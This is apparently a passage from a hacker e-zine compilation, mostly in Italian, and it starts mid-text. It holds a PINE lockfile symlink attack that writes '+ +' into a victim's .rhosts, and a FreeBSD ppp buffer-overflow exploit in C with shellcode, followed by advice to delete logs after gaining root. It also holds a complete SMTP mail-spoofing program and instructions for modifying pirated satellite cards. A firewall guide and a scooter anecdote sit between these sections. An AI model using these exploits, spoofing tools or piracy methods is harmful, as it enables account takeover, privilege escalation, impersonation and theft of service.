By watching the process table with ps to see which users are running PINE,  one can 
then do an ls in /tmp/ to gather the lockfile names for each user.  Watching the 
process table once again will now reveal when each user quits PINE or runs out of 
unread messages in their INBOX, effectively deleting
  the respective lockfile.

  Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for 
a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's 
process id as its contents.  One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, 
then rm /tmp/.hamors_lockfile.

This was writen by Sean B. Hamor…For this example, hamors is the victim while catluvr 
is the attacker:

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep pine
hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep pine
hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

now on to another one, this will be the last one that I'm going to show. Exploitation 
script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. 
Works on
  FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up:

#include 
#include 
#include 

#define BUFFER_SIZE     156     /* size of the bufer to overflow */

#define OFFSET          -290    /* number of bytes to jump after the start
                                   of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[])
{
        char *buf = NULL;
        unsigned long *addr_ptr = NULL;
        char *ptr = NULL;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"  /* 20 bytes */
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    /* 15 bytes, 57 total */
   
        int i,j;

        buf = malloc(4096);

        /* fill start of bufer with nops */

        i = BUFFER_SIZE-strlen(execshell);

        memset(buf, 0x90, i);
        ptr = buf + i;

        /* place exploit code into the buffer */

        for(i = 0; i < strlen(execshell); i++) 
                *ptr++ = execshell[i];

        addr_ptr = (long *)ptr;
        for(i=0;i < (104/4); i++)
                *addr_ptr++ = get_esp() + OFFSET;

        ptr = (char *)addr_ptr;
        *ptr = 0;

        setenv("HOME", buf, 1);

        execl("/usr/sbin/ppp", "ppp", NULL);
}

Now that you've gotten root "what's next?" Well the choice is up to you but I would 
recommend changing the password before you delete or change anything. To change their 
password all you have to do is login via telnet and login with your new account. Then 
you just type: passwd  and it will ask you for the old password first followed by the 
new one. Now only you will have the new pw and that should last for a while you can now 
upload you pages, delete all the logs and just plain do your worstJ Psychotic writes 
our own exploits and we will be releasing them soon, so keep your eyes open for them. 
We recommend that if you are serious about learing ethnical hacking that you download 
our Unix Bible.









/===========================::=============================::=================/
/  /Semplice fake e-mail! /                                  sYn
/===========================::=============================::=================/





Esistono diversi modi per inviare una email con l'indirizzo del mittente falso, 
questo tipo di e-mail è piu' conosciuta a tutti come fake mail! 
In questo art vi spiego brevemente un semplice metodo e vi daro' il sorgente 
di un'interessante programma .

Naturalmente come tutti sanno dovremmo sfruttare il servizio SMTP, sono 
molti i server che lo abilitano e quelli che usano il Sendmail. Al limite 
potremmo ottenere il root scrivendo proprio a lui facendo finta di essere 
qualche "illustre" ..ma ormai questo trucco lo usano in pochi...e forse proprio 
per questo si potrebbe usare...;

Passiamo alla pratica. Non dobbiamo fare altro che connetterci alla porta 25 del server,
naturalmente tramite /bin/telnet.			

darkstar:/# telnet alvo 25
Trying XXX.XXX.XXX.X...
Connected to X.
Escape character is '^]'.
220 XXX ESMTP Sendmail 8.9.3/8.9.3; Sun, 31 Dec 2000 22:26:22 -0300
helo localhost.localhost
250 XXX Hello localhost [127.0.0.1], pleased to meet you
mail from: fhc@senato.gov.br
250 fhc@senado.gov.br... Sender ok
rcpt to: root@localhost
250 root@localhost... Recipient ok
data
354 Enter mail, end with "." on a line by itself
testo della fakemail
.
250 WAA00163 Message accepted for delivery
quit
221 darkstar closing connection
Connection closed by foreign host.


Adesso vi riporto molto semplicemente i comandi che abbiamo dettato, 
questi sono i semplici passi:

1 - HELO diamo una sorta di benvenuto al servizio
2 - MAIL FROM: <l'indirizzo falso>
3 - RCPT TO: <indirizzo al quale inviare> 
4 - DATA scrivete qui il testo del messaggio
5 - E . lasciate una riga e scrivete un punto

Ed ecco il programma che ho trovato e modificato grazie all'aiuto di un mio 
amichetto sconociuto...:

-------------------------------------------------------------------------
/* PROGRAMMA PER L'INVIO DI E-MAILS
 * CON INDIRIZZO DI ORIGINE ERRATA.
 * syn@hackersat.com
 * http://www.hackersat.com/
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

#define  ERROR	  -1 
#define  PORT	  25

int Mensagem(int Socket);

int main(int argc, char *argv[]){
char Recv[1024], Send[1024];
int Socket, R;
struct hostent *host;
struct sockaddr_in alvo;
                              

if(argc < 4){
printf("Faker - Envia Mails Forjados!\n\n");
printf("Uso: %s [host_alvo] [usuario_alvo] [rementente_forjado]\n\n",argv[0]);
printf("H@ - http://www.hackersat.com/\n");
exit(ERROR);
}

host = gethostbyname(argv[1]);
if(host == NULL){
fprintf(stderr,"Host Desconhecido!\n");
exit(ERROR);
}

alvo.sin_family = host->h_addrtype;
alvo.sin_port = htons(PORT);
alvo.sin_addr = *((struct in_addr *)host->h_addr);
bzero(&(alvo.sin_zero), 8);

Socket = socket(AF_INET, SOCK_STREAM,0);
if(Socket < 0){
perror("Socket");
exit(ERROR);
}

if(connect(Socket,(struct sockaddr * )&alvo, sizeof(alvo)) < 0){
fprintf(stderr,"Erro em connect()!!\n");
close(Socket);
exit(ERROR);
}

bzero(Send, sizeof(Send));
bzero(Recv, sizeof(Recv));
snprintf(Send,1023,"HELO localhost.%s\n",argv[1]);
write(Socket,Send,strlen(Send));
if ((R = read(Socket, Recv, sizeof(Recv))) < 0){
fprintf(stderr,"Risposta!");
close(Socket);
exit(ERROR);
}

if(!strstr(Recv,"ok")){
printf("1o. Helo risposto OK!:)\n");
}
else{
fprintf(stderr,"Problema con HELO!\n");
close(Socket);
exit(ERROR);
}

bzero(Send, sizeof(Send));
bzero(Recv, sizeof(Recv));
snprintf(Send,1023,"MAIL FROM: %s\n",argv[3]);
write(Socket,Send,strlen(Send));
if ((R = read(Socket, Recv, sizeof(Recv))) < 0){
fprintf(stderr,"Risposta per MAIL FROM!\n");
close(Socket);
exit(ERROR);
}

if(!strstr(Recv,"ok")){
printf("2o. Mail From risposto OK!:)\n");
}
else{
fprintf(stderr,"Problema con Mail From!\n");
close(Socket);
exit(ERROR);
}

bzero(Send, sizeof(Send));
bzero(Recv, sizeof(Recv));
snprintf(Send,1023,"rcpt to: %s\n",argv[2]);
write(Socket,Send,strlen(Send));
if ((R = read(Socket, Recv, sizeof(Recv))) < 0){
fprintf(stderr,"Risposta per Rcpt to!\n");
close(Socket);
exit(ERROR);
}

if(!strstr(Recv,"Recipient ok")){
printf("3o. Rcpt To risposto OK!:)\n");
}
else {
fprintf(stderr,"Problema con RCPT TO!\n");
close(Socket);
exit(ERROR);
}

bzero(Send, sizeof(Send));
bzero(Recv, sizeof(Recv));

Mensagem(Socket);
return 0;
}


#define max(x,y) ((x)>(y)?(x):(y))

int Mensagem(int Socket){
char envia[4056], recebe[1024], buffer[4056];
fd_set rset;
int  R, maxfd;

sleep(1);

bzero(envia, sizeof(envia));
bzero(recebe, sizeof(recebe));

printf("Digite sua Mensagem\n");
strcpy(envia,"DATA\n");
write(Socket, envia, strlen(envia));
if ((R = read(Socket, recebe, sizeof(recebe))) < 0){
fprintf(stderr,"Problema con DATA!\n");
close(Socket);
exit(ERROR);
}
if(!strstr(recebe,"Enter mail")){
bzero(envia, sizeof(envia));
bzero(recebe, sizeof(recebe));
for (;;){
    FD_SET(fileno(stdin), &rset);
    FD_SET(Socket, &rset);
    maxfd = max(fileno(stdin), Socket) + 1;
    select(maxfd, &rset, NULL, NULL, NULL);
    if (FD_ISSET(fileno(stdin), &rset)) {
      bzero(envia, sizeof(envia));
    while(!strstr(envia,"FIM")){ 
    fgets(buffer, sizeof(envia) - 2, stdin);
    strcat(envia,buffer);}
    strcat(envia,"\n.\n");
    write(Socket, envia, strlen(envia));
   }
    if (FD_ISSET(Socket, &rset))
    {
      bzero(recebe, sizeof(recebe));
      if ((R = read(Socket, recebe, sizeof(recebe))) == 0){
	printf("ok!\n");
}
}
else
      {
        return (ERROR);
      }
    }
}
bzero(envia, sizeof(envia));
bzero(recebe, sizeof(recebe));
strcpy(envia,"QUIT");
write(Socket, envia, strlen(envia));
if ((R = read(Socket, recebe, sizeof(recebe))) < 0){
fprintf(stderr,"Ctrl + C!\n");
close(Socket);
exit(ERROR);
}

printf("Fakemail inviata con successo!!\n");
return 0;
}

------------------------------------------------------------------------

Adesso vi mostro un piccolo mio "vecchio" esempio di fakemail con un'analisi + accurata.

Sicuramente la maggiorparte di voi ha incontrato o configurato un programma in internet 
per l'invio di posta ...da questo deduciamo che è essenziale conoscere il nome di un certo 
SMTP server ovvero il server dedicato alle outgoing mail oltre ad alcune 
informazioni sull'utente. 
Siccome tuttavia a noi utenti di Linux piace molto lavorare il piú possibile 
senza programmi che facciano da tramite tra noi e l'azione che vogliamo 
eseguire, vediamo in dettaglio cosa accade quando ci mettiamo in contatto con questo server. 

SMTP SERVER: Quando deve spedire un messaggio di posta elettronica il nostro 
programmino si collega alla porta 25 dell'SMTP SERVER e fornisce alcuni comandi 
che ora vedremo nel dettaglio. Proviamo dunque a collegarci alla porta 25 di un 
qualsiasi server SMTP, per esempio sibervision.com. 

Riporto di seguito una sessione qualsiasi 


telnet sibervision.com 25
Connected to sibervision.com.
Escape character is '^]'.
220 ESMTP www15.clever.net Sendmail 8.8.5/8.6.9 ready at Wed, 19 Mar 1997 19:54:47 -0500 (EST)
HELO default
250 www15.clever.net Hello swrm250-126.iol.it [194.21.250.126], pleased to meet you
MAIL FROM: pd.gabanaz@iol.it
250 pd.gabanaz@iol.it... Sender ok
RCPT TO: pd.gabanaz@iol.it
250 pd.gabanaz@iol.it... Recipient ok
DATA
354  Enter mail, end with "." on a line by itself
subject: Ma sei scemo che ti mandi i messaggi da solo??
in effetti mi sento molto solo :-)
.
250 TAA18303 Message accepted for delivery
QUIT

Vediamo un po in dettaglio cosa è successo...ovviamente le linee precedute da 
numeri sono le risposte dell'host a cui mi sono collegato. 
Non appena entriamo nella porta 25 ci viene comunicato che in quella porta è 
funzione una versione di Sendmail, proprio il programma dedicato alla consegna 
di messaggi di posta elettronica. Come sapete,  questo fatto della versione di 
sendmail ci è molto utile sopratutto se vogliamo bucare il server!
Con il comando HELO ci presentiamo al server, infatti serve solo a comunicare 
al server che siamo pronti. A questo punto diciamo tramite il comando MAIL FROM: 
quale indirizzo va inserito nel campo From:, quello al quale poi verranno inviate 
eventuali repliche, dopodiche' con RCPT TO: diciamo a sendmail a chi deve 
recapitare questa mail e tramite il comando DATA inseriamo rispettivamente il 
subject del messaggio, il testo vero e proprio ed un punto da solo su una linea 
per comunicare la fine del messaggio. 
A questo punto la linea 250 TAAA18303 Message... ci dice che il messaggio con 
TUTTI i dati di chi lo spedisce è stato memorizzato e verrá recapitato al piú presto .

Bene, spedito il messaggio andiamo a controllare con Pine (programma che spedisce 
messaggi tramite SMTP) che cosa è successo: 
Se ritiriamo la posta e diciamo a Pine di visualizzare tutti i campi vediamo quanto segue: 


X-POP3-Rcpt: pd.gabanaz@iol-mail.iol.it
Return-Path: pd.gabanaz@iol.it
Received: from www15.clever.net (root@[208.5.1.1]) by iol-mail.iol.it
(8.8.3/8.6.12) with ESMTP id BAA02914 for ; Thu, 20 Mar 1997 01:56:31 +0100
From: pd.gabanaz@iol.it
Received: from swrm250-126.iol.it [194.21.250.126] by www15.clever.net
(8.8.5/8.6.9) with SMTP id TAA18303 for pd.gabanaz@iol.it; Wed, 19 Mar 1997
19:55:40 -0500 (EST)
Date: Wed, 19 Mar 1997 19:55:40 -0500 (EST)
Message-Id: <199703200055.taa18303@www15.clever.net>
subject: Ma sei scemo che ti mandi i messaggi da solo??
in effetti mi sento molto solo :-)

ebbene abbiamo spedito una e-mail direttamente dalla porta 25 del nostro SMTP host! 

È facile verificare che semplicemente cambiando alcuni dati in fase di 
impostazione possiamo spedire quella che viene comunemente denominata fake mail, 
ovvero messaggi "truccati di posta elettronica"...anziché ripetere il processo 
vi faccio vedere semplicemente il log di una sessione in cui ho spedito, sempre 
a me stesso, una fake-mail: 


telnet sibervision.com 25
Connected to sibervision.com.
Escape character is '^]'.
220  ESMTP www15.clever.net Sendmail 8.8.5/8.6.9 ready at Wed, 19 Mar 1997 19:54:47 -0500 (EST)
HELO vediamo.che.succede.com
250 www15.clever.net Hello swrm250-126.iol.it [194.21.250.126], pleased to meet you
MAIL FROM: hey@funziona
250 hey@funziona... Sender ok
RCPT TO: pd.gabanaz@iol.it
250 pd.gabanaz@iol.it... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
subject: sembra carino, no?
ciao ciao
.
250 TAA18303 Message accepted for delivery
QUIT
221 www15.clever.net closing connection

E questo è al solito il risultato: 


X-POP3-Rcpt: pd.gabanaz@iol-mail.iol.it
Return-Path: hey@funziona
Received: from www15.clever.net (root@[208.5.1.1]) by iol-mail.iol.it
(8.8.3/8.6.12) with ESMTP id BAA02914 for ; Thu, 20 Mar 1997 01:56:31 +0100
From: hey@funziona
Received: from vediamo.che.succede.com (swrm250-126.iol.it
[194.21.250.126]) by www15.clever.net (8.8.5/8.6.9) with SMTP id TAA18303
for pd.gabanaz@iol.it; Wed, 19 Mar 1997 19:55:40 -0500 (EST)
Date: Wed, 19 Mar 1997 19:55:40 -0500 (EST)
Message-Id: <199703200055.taa18303@www15.clever.net>
subject: sembra carino, no?

ciao ciao

Come vedete questa volta "sembra" che la lettera sia stata spedita dall'host: 

vediamo.che.succede.com 

e che il mittente sia un certo: 

hey@funziona 

Ovviamente all'utente piú esperto non sfuggirá il fatto che in realtá accanto a: 

vediamo.che.succede.com 

si trova esplicitamente il nome di un provider che non coincide proprio con quel che 
vorremmo sembrasse, peró tenete presente che quasi mai si guardano tutti i campi di 
una mail, quindi per fare qualche scherzetto innocente andrá piú che bene ! 

Una ultima nota: in tutti i messaggi compare un identificatore di messaggio, ebbene 
tramite quello, facendone eventualmente richiesta al sysop, chiunque abbia spedito 
fakemail è rintracciabile, poiché in esso sono racchiusi data, ora e IP di chi si 
collega, ovvero tutti i dati necessari per decodificare la provenienza del messaggio. 
Inoltre a seconda delle versioni di Sendmail che compaiono possono esservi alcune 
modificazioni; potrebbero per esempio comparire al posto del campo From un 
Apparently from o anche un Apparently to, tuttavia vale quanto sopra, cioé 
difficilmente si guarda a questi campi; in alcune implementazioni di Sendmail 
sono presenti anche i comandi di help, quindi una volta entrati alla porta 25 
provate il comando HELP per vedere se è disponibile, ed eventualmente date un'occhiata 
alle possibilitá che avete. 



è tutto




Parti di questo testo mi sono state inviate. Prima rielaborate.


sYn      syn@hackersat.com         www.hackersat.com






/===========================::=============================::=================/
/  /Costruire un bunker linux: Firewalling di base /         kEwL             /
/===========================::=============================::=================/


Costruire un Bunker Linux: Firewalling di Base
di Rafael Coninck Teigao
tradotto da kEwL`
ultimo aggiornamento Lunedì, 8 Maggio 2000

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Questo articoo presenta un modo di convertire ogni separata macchina che hai in 
una rete dietro un gateway, utilizzando il Network Address Translation (NAT), e 
le funzioni di firewalling presenti in Linux. 

Alcune nozioni di base per essere indirizzato. Questo non è un host ordinario, e 
non dovrebbe essere visto. Questo host sarà usato solo per il firewalling e NAT, 
e nient'altro. Questo significa che non dovrai eseguire altri servizi. Inoltre, 
se stai per reindirizzare dei servizi in una macchina all'interno, assicurati 
che il servizio non abbia molte vulnerabilità, e che sia aggiornato. Se non 
tieni conto di queste cose, il tuo firewall potrebbe diventare inutile.

Le ultime versioni del kernel di Linux non sono sicuramente le versioni più 
staili e affidabili. Se la tua macchina non necessita gli ultimi drivers, 
scarica e installa un kernel stabile, sicuro e ben testato; il kernel 2.0.38 è 
il migliore. Devi abilitare l'IP Forwarding, l'IP Masquerading, l'IP 
Firewalling, l'IP Transparent Proxying e l'IP Routing. Se stai avendo dei dubbi 
a compilare questo kernel, dai uno sguardo a 
http://www.suse.de/~florian/kernel+egcs.html. Questo sito ha una patch per 
compialre questo kernel con egcs.

Ora che hai installato e compilato un kernel stabile, e letto e messi in pratica 
gli articoli nominati precedentemente, andiamo a configurare il firewall. Ho 
creato una serie di shell scripts che ti aiuteranno nella configurazione di 
base. Come li presento, spiegherò cosa fanno, come usarli e dove metterli. Per 
piacere, ricordati che penso tu stia usando RedHat e che le directory potrebbero 
essere diverse in altre distribuzioni.

Inoltre, dovresti cambiare il blocco di indirizzi interni (ho usato 10.x.x.x) in 
quello che vuoi. Usare indirizzi IP non utilizzati nella rete interna è una 
buona idea per un certo numero di ragioni, l'ultima delle quali che non avrai 
nessun problema di collisione fra IP interni ed esterni.

File: firewall
Path: /etc/rc.d/init.d/ 

# Svuota il firewall
ipfwadm -F -f
ipfwadm -I -f
ipfwadm -O -f
#
# setta IP packet Accounting e Forwarding
#
# Forwarding
#
# DENY tutti i servizi
ipfwadm -F -p deny
# E ACCEPT tutte le connessioni dell'interfaccia interna
ipfwadm -F -a accept -m -P all -S 10.0.0.0/8
#
# setta IP pachet per Transparent Proxying
# usa questo SOLO se hai SQUID sulla macchina
#
# Entrata
#
# ACCEPT tutti i servizi
ipfwadm -I -p accept
# Questo reindirizzerà tutte le connessioni verso l'interno al tuo proxy
ipfwadm -I -a accept -P tcp -S 10.0.0.0/8 -D 0.0.0.0/0 80 -r 3128
#
# Setta a DENY tutte le connessioni da un IP
#
# Entrata
#
# ipfwadm -I -a deny -P all -S IPnumber

Eseguilo all'avvio.

Editare /etc/hosts.allow e /etc/hosts.deny è una buona idea. Dovrebbero essere 
simili a questi:

File: hosts.allow
Path: /etc/

ALL: 10.
22: ALL
80: ALL

File: hosts.deny
Path: /etc/

ALL: ALL


In questo modo stai accettando ogni connessione in entrata alla porta SSH e 
HTTP, connessioni da 10.x.x.x per lavorare con ogni demone installato sul 
firewall, e rifiutando tutte le altre connessioni.

I prossimi script sono usati per controllare se tutto è in esecuzione, e 
cercando di risolvere semplici problemi come se per esempio cade un'interfaccia 
o il masquerade proxy smette di lavorare.

File: crontab --> modificalo per aggiungere queste linee (crontab -e)
Path: /etc/

0-59 * * * * root /usr/local/gateway/bin/check-ALL-masq
0-59 * * * * root /usr/local/gateway/bin/check-ALL-eth

File: check-ALL-masq
Path: /usr/local/gateway/bin/

#!/bin/sh
/usr/local/gateway/bin/check-CU_Seeme `lsmod | awk '{print $1}' | grep 
ip_masq_cuseeme`
/usr/local/gateway/bin/check-FTP `lsmod | awk '{print $1}' | grep ip_masq_ftp`
/usr/local/gateway/bin/check-IRC `lsmod | awk '{print $1}' | grep ip_masq_irc`
/usr/local/gateway/bin/check-Quake `lsmod | awk '{print $1}' | grep 
ip_masq_quake`
/usr/local/gateway/bin/check-RealPlayer `lsmod | awk '{print $1}' | grep 
ip_masq_raudio`
/usr/local/gateway/bin/check-VDOLive `lsmod | awk '{print $1}' | grep 
ip_masq_vdolive`

File: check-CU_Seeme; check-FTP; check-IRC; check-Quake; check-RealPlayer; 
check-VDOLive
Path: /usr/local/gateway/bin/

#!/bin/sh case "$1" in

OPTION_1)

exit 0
esac
/usr/local/gateway/bin/solve-ALL-masq OPTION_2


Dove OPTION_1 e OPTION_2 dovrebbero essere prese dlla tabella sottostante. 
Ricorda che devi creare 6 files differenti.

File OPTION_1 OPTION_2 
check-CU_Seeme ip_masq_cuseeme cuseeme 
check-FTP ip_masq_ftp ftp 
check-IRC ip_masq_irc irc 
check-Quake ip_masq_quake quake 
check-RealPlayer ip_masq_raudio raudio 
check-VDOLive ip_masq_vdolive vdolive 


File: solve-ALL-masq
Path: /usr/local/gateway/bin/

#!/bin/sh
case "$1" in

all)

  cd /lib/modules/2.0.38/ipv4 
  modprobe -s ip_masq_cuseeme.o 
  modprobe -s ip_masq_ftp.o 
  modprobe -s ip_masq_irc.o 
  modprobe -s ip_masq_quake.o 
  modprobe -s ip_masq_raudio.o 
  modprobe -s ip_masq_vdolive.o 
;; 
cuseeme) 
  cd /lib/modules/2.0.38/ipv4 
  modprobe -s ip_masq_cuseeme.o 
;; 
ftp) 
  cd /lib/modules/2.0.38/ipv4 
  modprobe -s ip_masq_ftp.o 
;; 
irc) 
   cd /lib/modules/2.0.38/ipv4 
   modprobe -s ip_masq_irc.o 
;; 
quake) 
   cd /lib/modules/2.0.38/ipv4 
   modprobe -s ip_masq_quake.o 
;; 
raudio) 
  cd /lib/modules/2.0.38/ipv4 
  modprobe -s ip_masq_raudio.o 
;; 
vdolive) 
  cd /lib/modules/2.0.38/ipv4 
  modprobe -s ip_masq_vdolive.o 
;; 
*) 
  echo "" 
  echo "Usage: solve-ALL-masq {all|cuseeme|ftp|irc|quake|raudio|vdolive}" 
  echo "" 
exit 1
esac

File: check-ALL-eth
Path: /usr/local/gateway/bin/

#!/bin/sh
/usr/local/gateway/bin/check-ETH0 `ifconfig | awk '{print $1}' | grep eth0`
/usr/local/gateway/bin/check-ETH1 `ifconfig | awk '{print $1}' | grep eth1`

File: check-ETH0; check-ETH1
Path: /usr/local/gateway/bin/

#!/bin/sh
case "$1" in

eth0)

exit 0
esac
/usr/local/gateway/bin/solve-ALL-eth eth0


Cambia eth0 in eth1 per creare entrambi i files.

File: solve-ALL-eth
Path: /usr/local/gateway/bin/

#!/bin/sh
case "$1" in

all)

  /etc/rc.d/init.d/network restart

;;

eth0)

  echo ""

  echo "Reinitializing eth0"

  echo ""

  /sbin/ifup eth0

;;

eth1)

  echo ""

  echo "Reinitializing eth1"

  echo ""

  /sbin/ifup eth1

;;

*)

  echo ""

  echo "Usage: solve-ALL-masq {all|eth0|eth1}"

  echo ""

  exit 1
esac

Dopo di ciò, hai una firewall con il masquerading.

Passi finali: scarica, installa e impara ad usare dei tools che ti aiuteranno a 
gestire e risolvere problemi futuri con il tuo firewall.

Sniffer: il miglior modo di risolvere i problemi di rete. Gli sniffers di 
pacchetti ti mostrano il traffico sulla tua rete. Il miglior sniffer è Sniffit, 
disponibile con la documentazione a: 
http://reptile.rug.ac.be/~coder/sniffit/sniffit.html 

Redirect: questo tool è usato per reindirizzare le connessioni che vengono da un 
IP e un porta verso un altro IP e un'altra porta. Poi usare questo sul firewall 
per reindirizzare le connessioni su una macchina interna, o idealmente, su una 
macchina che non sta dietro al firewall. Questo ti permetterà di avere i servizi 
accessibili all'esterno, senza aver bisogno di farli passare attraverso un 
firewall. Il tool che uso è chiamato rinet e può essere trovato, insieme alla 
documentazione, a: http://www.boutell.com/rinetd/.

Monitoraggio dell'Utilizzo di Rete: E' molto importante sapere quanto e come è 
utilizzta la tua rete, così puoi fare dei piani sull'upgrading, capire i bisogni 
dei tuoi clients e analizzare il traffico di rete. Un tool che è tra i più 
diffusi è chiamato NTop. E' simile al comando Unix top e ha interfaccia testuale 
e web based. Puoi trovarlo a: http://www.ntop.org/.

Proxy: la maggior parte degli amministratori vogliono installare un server 
proxy, per ridurre il lavoro di banda che si ha quando le persone accedono a una 
pagina web. Il modo più facile di fare ciò è settare un Transparent Proxy sulla 
macchina Firewall/NAT. Nella configurazione del firewall c'è una regola sul 
Transparent Proxying. Se lo setti, dai uno sguardo a Squid, il proxy server più 
diffuso: http://www.squid-cache.org/.


Altre risorse NAT: ci sono molte pagine web su NAT, e queste possono aiutarti se 
ci sono problemi descritti in questo documento, o se semplicemente vuoi maggiori 
informazioni:

Linux IP Masquerade HOWTO : 
http://www.linuxdoc.org/HOWTO/IP-Masquerade-HOWTO.html.

IP Masq ICQ : http://members.tripod.com/~djsf/masq-icq/.

IP Masquerade Application Collection : http://members.home.net/ipmasq/.

TkMasqdialer : Controlla le connessioin PPP su un server Masq: 
http://www.midcoast.com.au/~mvoase/tkmasq.html.

Server HTTP: il server Apache ha opzioni per settare virtual hosts e anche per 
reindirizzare connessioni HTTP in entrata. Il miglior modo di usare un host 
interno come HTTP server per il mondo è usare Apache con il reindirizzamento 
all'host interno: http://www.apache.org/.

Questo è probabilmente tutto quello che dovresti sapere sui server Firewall/NAT 
se non vuoi complicarti la vita nella tua configurazione. Spero che farai buon 
uso di questi scripts che ho presentato, e che li trovi facili da modificare per 
adattarli alla tua rete. Ho usato questa configurazione per 2 anni su molte 
macchine e nessuna ha mai subito un'intrusione - e i miei logs dicono che la 
gente ci ha provato. Questo non significa che è impossibile entrarvi, poichè 
qualcuno potrebbe trovare un errore e sfruttarlo. Quindi dovresti tenere sempre 
un occhi aperto e leggere i documenti di sicurezza sul tuo sistema operativo e 
sulle applicazioni che usi, e aggiornare sempre tutto.
 





/===========================::=============================::=================/
/  /Inserimento Zener /                                      sYn              /
/===========================::=============================::=================/



Lo abbimo testato io è un mio amico, abbiamo fino ad ora riscontrato buoni risultati.
Bene cosa è lo zener ? Lo zener non è altro che un semplice diodo. 
Che messo tra alcuni determinati piedini dell'eeprom e chip riescono a filtrare 
i dati maliziosi che vengono inviati dai dirigenti per chi usa le tanto 
conosciute wafercard piratate. Gli effetti dell'invio di questi dati, + 
conosciuto come la "bomba", sono quello dell'alterazione dei codici, così 
da non poter far vedere nulla! E per noi questo è molto molto fastidioso....
Quindi passiamo subito a quello che dovete fare.
In un comune negozio di elettronica dovreste acquistare un diodo mezzo W/12 V (mezzo 
watt /12 volt), con questo tipo di diodo abbiamo sperimentato noi. Adesso con un 
normale saldatore dobbiamo saldare sui piedini 4 - 4 di chip ed eeprom (rispettivamente). 
Senza troppe parole vi ho reso facile il compito con un piccolo disegnino !




       \--------------\
       \              \
       \              \
       \              \
       \              \
       \              \ 
       \              \ 
       \              \ 
       \              \
       \              \ 
       \              \
       \||||||||| ||||\
       \||||||||| ||||\
       \     |    |   \
       \     |_==_|   \
       \     zener    \ (osservate bene i piedini)
       \--------------\
 
 
Penso di essere stato + chiaro possibile.
Scusatemi se ho sbagliato qualcosa nella spiegazione e vi invito a scrivermi per qualsiasi 
incomprensione.




sYn      syn@hackersat.com         www.hackersat.com

/===========================::=============================::=================/
/  /Modifica alla Scarabeo (Aprilia) /                       Jrash            /
/===========================::=============================::=================/


Ciao ragazzi sono sempre io, Jrash, in questo articoletto vorrei
parlarvi di una cosetta molto sfiziosa che abbiamo fatto io       
e il mio amico Emilio durante quest'estate...			 
credo che tutto cio che abbiamo fatto non l abbia fatto mai nessuno.....			
Percio vi invito a leggere tutto e poi alla fine, se ne avete le                               
capacita di provare anche voi a farlo...			

Mamma mia, solo al pensiero mi viene la voglia di rifarlo....
che bella sensazione, una cosa davvero stupenda........		

Era il diciotto luglio dell estate 2000/2001, una giornata non
molto bella poiche c era un po' di vento ed allora io e il mio
amico Emilio decidemmo di non andare al mare e di andare nel suo
garage a fare qualche esperimento sui nostri motorini....	
Gia da come spero avete capito il mio motorino è un SR preparato,                            
cioè da competizione che sulle strade della citta' è davvero un bolide...	

Allora mentre andavamo nel garage di Emilio io mi divertivo a
impennare su una sola ruota e ha fare il "pazzo" nel traffico, emilio
faceva lo stesso con il suo direi "grande" scarabeo dell aprilia,
sempre da competizione, con una ripresa pari a quella di uno dei
migliori 125, uno scooter veramente fantastico che solo pazzi come
noi hanno il coraggio di guidare...		                       
Arrivati una volta nel garage poggiamo gli scooter sul pavimento e
muniti di chiavi iniziammo a smontare marmitta, ruote , sospensioni 
e carrozzeria.                     
Una volta fatto cio' non sapevamo cosa fare e cosi andammo a comprarci
un gelato; per la strada vedemmo uno scooter un motorino direi un
po' strano che non avevo mai visto prima d ora, se non mi sbaglio
era della YAMAHA....boh non mi ricordo..					
Comunque questo motorino ci aveva colpito molto e cosi andammo di 
corsa al garage di Emilio, e decidemmo di mettere le route dell sr
allo scarabeo, e quelle dello scarbeo all'sr...		   
Cosi ci mettemmo al lavoro, un duro lavoro direi, non tanto per lo  
scarabeo ma per l sr perche per metterci la ruota dello scarabeo      
dovevamo smontare anche parafango e tutto il carter oil, una vera  
seccatura , ma ne valeva la pena.			
Montate le ruote ci accingemmo a fare lo stesso con le sospensioni:   
qui la cosa si complica ancora di piu', infatti dovevamo smontare     
tutta la carrozzeria sospensioni, di nuovo la ruota davanti i freni 
e tutto il resto.					
Dopo tre ore di duro lavoro anche l operazione sospensioni era 
completata.				
I I motorini dopo questa modifica erano davvero dei mostri, erano
conciati in tal modo che se ci prendeva la polizia ci arrestavano.
Durante quei momenti ero molto felice ed emozionato, subito io e il
mio amico andammo nella costiera amalfitana, essendo di salerno, per
